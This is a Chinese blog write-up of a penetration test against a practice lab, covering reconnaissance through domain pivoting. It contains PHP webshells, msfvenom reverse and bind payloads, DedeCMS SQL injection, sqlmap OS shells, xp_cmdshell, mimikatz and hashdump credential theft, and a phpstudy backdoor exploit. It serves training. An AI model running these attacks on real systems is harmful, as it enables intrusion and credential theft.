打靶日记(一) 完整的渗透测试实例
声明:此系列文章系个人记录打靶过程的文章,靶场为暗月师傅的靶场。这是第一篇。
前言
开一个新的分类“打靶日记(moon)”,这一个系列记录了我的打靶的日常,这系列大概是打了六七个暗月师傅的靶场。于是乎,我一一下载到本地进行搭建和攻击,包含了外部打点、权限提升、权限维持、内网横向渗透、域渗透等内容。这个是第一个靶场。
1.靶场介绍
本靶场存在四个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好
1.1本靶场示意图
2. 信息收集
2.1.主机发现
1 | netdiscover -i eth0 -r 192.168.1.0/24 |
2.2masscan 端口扫描
(使用发包率10000的时候没扫出来)
1 | masscan -p 0-65535 192.168.1.134 --rate=1000 |
2.3Nmap进行端口信息探测
1 | nmap -sC -A 192.168.1.134 -p 135,49155,6588,21,3389,80,999,53,49154 -oA cc123-port |
2.4网站信息
1 | http://192.168.1.134:999/ |
1 | http://192.168.1.134/ |
1 | http://192.168.1.134:6588/ |
3.本地设置
3.1.绑定本地 hosts
1 | C:\Windows\System32\drivers\etc\hosts |
3.2设置本地网关
1 | vim /etc/resolv.conf |
4.收集子域名
4.1wfuzz穷举子域名
1 | wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53 |
显示没有路由
在靶机配置DNS
修改hoset
1 | vim /etc/resolv.conf |
1 | wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53 |
过滤掉53
5.子域名信息
Dedecms |
new.cc123.com |
---|---|
kesionEDU |
www. cc123.com |
net |
ww2 cc123.com |
6.漏洞测试
6.1dedecms安全检测
查看版本号
1 | new.cc123.com/data/admin/ver.txt |
会员注册处有注入的漏洞
注册会员
添加分类
拿到cookie
放到脚本的cookie记事本中
执行脚本,指定网站
1 | python2 .\Dedecms_20150618_member_sqli.py http://new.cc123.com |
1 | 密文 812df726be884ddcfc41 解密:admin7788 |
在网站解密
得到密码之后,来到后台
1 | http://new.cc123.com/dede/login.php?gotopage=%2Fdede%2F |
输入账号密码之后登录:
在文件管理处上传webshell
添加一句话木马语句到图片中
1 | <?php @eval($_POST['garck']);?> |
上传文件
抓包修改后缀
1 | http://new.cc123.com/a/ma.php |
验证
下载中国蚁剑加载器
1 | https://github.com/AntSwordProject/AntSword-Loader |
初始化的时候未检测代码的时候会进行自动下载
连接一句话木马
7.提取服务器
在终端执行命令失败
发现.net的功能
上传.net的大马
访问地址:http://new.cc123.com/a/ASPXSpy2014.aspx
密码是:admin
可以执行cmd命令
7.1metasploit windows提权
生成msf的木马
1 | msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.133 lport=55555 -f exe >garck.exe |
上传至于服务器,发现上传的时候被拒绝
7.2扫描可写目录
上传扫描 目录可写 的脚本
开始检测
发现以下的目录是可写的
将msf生成的木马上传至于:
1 | c:\windows\debug\WIA\ |
开启msf的监听
打开msf控制端
Msfconsole
1 | 选择handler模块 |
7.3得到meterpreter
发现成功上线了
查看当前权限,发现为比较普通的iis用户权限
7.4检测能提权的漏洞
开始检测提权
使用模块查询是否可以提权
Background
检测可以用来提权的模块
1 | use post/multi/recon/local_exploit_suggester |
7.5ms16_075提权
开始提权
1 | 使用use exploit/windows/local/ms16_075_reflection_juicy |
9.测试ww2.cc123.com安全
9.1gobuster目录扫描
1 | gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html" -o ~/cc123/cc123.log |
扫描网站目录
http://ww2.cc123.com/admin 管理后台
http://ww2.cc123.com/editor 编辑器
经测试后台的密码是 cc123
9.2SQL注入拿下mssql服务器
登录:http://ww2.cc123.com/admin/Login.aspx
admin cc123
cc123 qweasd123
抓取数据包
保存到22.txt中
测试注入
1 | sqlmap -r 22.txt --dbms mssql -v 1 --batch |
列出库
1 | sqlmap -r 22.txt --dbms mssql -v 1 --dbs |
获取 **mssql shell **
1 | sqlmap -r 22.txt --dbms mssql -v 1 --os-shell |
10.多重网段内网渗透
10.1web服务器信息收集
10.1.1网卡信息
Ifconfig
查到两个IP:
10.10.10.128
192.168.1.134
10.1.2查看路由信息
1 | run get_local_subnets |
1 | Local subnet: 10.10.10.0/255.255.255.0 |
10.1.3哈希的获取
1 | run hashdump |
1 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2::: |
进程迁移到1568
1 | migrate 1568 |
10.1.4使用mimikatz获取明文
1 | 加载mimikatz |
1 | 搜索密码 |
整理结果
使用wdigest 或者tspkg
10.1.5添加路由进行内网渗透
1 | (绑定路由) |
1 | 查看绑定结果 |
Background
10.1.6启动 socks 代理
1 | use auxiliary/server/socks_proxy |
10.1.7修改 proxychains 配置文件
配置修改配置文件
1 | vim /etc/proxychains4.conf |
10.1.8使用proxychains 调用nmap扫描
1 | proxychains nmap -sT -Pn 10.10.10.145 |
10.2数据库服务器信息收集
10.2.1生成正向连接载荷
1 | msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe |
连接数据库:
1 | server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123..;database=master |
10.2.2mssql上传文件
上传生成的攻击载荷
(数据库的IP一定要对)
10.2.3执行文件并且获取session
执行
1 | exec master.dbo.xp_cmdshell 'C:/bind.exe' |
开始监听
1 | use exploit/multi/handler |
数据库服务器信息收集
网卡端口信息
os-shell 执行 netstat -ano 查看端口信息
网卡信息
查看进程ps
10.2.4进程迁移
1 | migrate 468 |
10.2.5加载mimikatz获取明文
1 | load mimikatz |
1 | creds_wdigest |
10.3渗透目标服务器
10.3.1添加路由
查看路由信息
1 | run get_local_subnets |
绑定IP
1 | run autoroute -s 10.10.1.0/24 |
1 | 查看绑定路由 run autoroute -p |
10.3.2phpstudy后门测试
在物理机将python添加到代理中
10.3.3python编写phpstudy后门exp
1 | #conding:utf-8 |
然后执行脚本尝试查看IP情况
1 | python phpstudy.py ipconfig |
10.3.4尝试写入shell
python phpstudy.py "echo ^<?php @eval($_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
将中国菜刀添加到代理中
10.3.5连接后门
查看权限
10.3.6获取目标机子的session
将正向连接的木马文件复制到物理机,尝试通过中国菜刀进行上传与运行
1 | use exploit/multi/handler |
1 | 全部的sessions |
4个flages
一、
1 | c:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\upimg\flag.txt |
二、
1 | C:\users\Administrator\root.txt.txt |
三、
1 | C:\users\Administrator\root.txt |